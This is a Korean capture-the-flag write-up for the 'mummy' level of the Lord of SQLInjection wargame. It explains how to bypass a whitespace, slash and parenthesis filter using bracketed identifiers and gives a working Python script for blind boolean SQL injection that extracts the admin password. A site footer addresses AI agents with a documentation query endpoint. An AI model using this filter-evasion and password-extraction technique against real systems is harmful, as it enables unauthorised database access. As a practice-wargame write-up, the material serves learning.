# mummy

첫 화면이다.

![](/files/-M-ndcXGMHV2i9nnor-t)

아래 코드로 인해 아스키코드표의 0x01 \~ 0x20까지 필터링이 되고, 따라서 모든 whitespace 문자를 사용할 수 없다.

```php
for($i=0;$i<strlen($_GET['query']);$i++) if(ord($_GET['query'][$i]) <= 32) exit("%01~%20 can used as whitespace at mssql");
```

`/` 가 필터링 되기 때문에 `/**/` 로 우회할 수도 없다.

`(` 와 `)` 도 필터링 된다.

대신, 아래와 같이 `[` 와  `]` 를 사용해 공백없이 쿼리를 구성한다.

![](/files/-M-rBA23h5n9s_SVs4Fo)

파이썬 코드를 짜면 다음과 같다.

```python
import requests
import string

URL = 'https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php?query='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello anonymous'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 0c3cc245
def find_pw():
    pw = ''
    while True:
        found = False
        for character in string.printable:
            if character in "#%&'_":
                continue
            elif query("'1'from[prob_mummy]where[id]='admin'and[pw]like'{}{}%25'".format(pw, character)) is True:
                pw += character
                found = True
                break
        if found is False:
            break
    print('pw: {}'.format(pw))


find_pw()
```

실행결과, pw는 `0c3cc245` 이다.

<https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php?pw=0c3cc245> 에 접속하면 문제가 풀린다.

![](/files/-M-rCoMKxYkf9i5RtfuN)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/mummy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.